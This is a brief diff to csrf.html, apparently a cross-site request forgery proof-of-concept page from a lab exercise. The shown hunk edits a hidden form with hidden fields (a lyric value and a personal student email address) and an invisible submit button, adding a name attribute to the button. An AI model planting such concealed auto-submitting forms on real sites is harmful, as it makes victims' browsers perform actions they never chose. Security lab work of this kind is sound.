--- a/csrf.html
+++ b/csrf.html
@@ -20,7 +20,7 @@
         value="Never gonna run around and desert you"
       />
       <input type="hidden" name="email" value="2022201555@ruc.edu.cn" />
-      <input type="submit" value="submit" style="display: none" />
+      <input type="submit" name="submit" value="submit" style="display: none" />
     </form>
   </body>
 
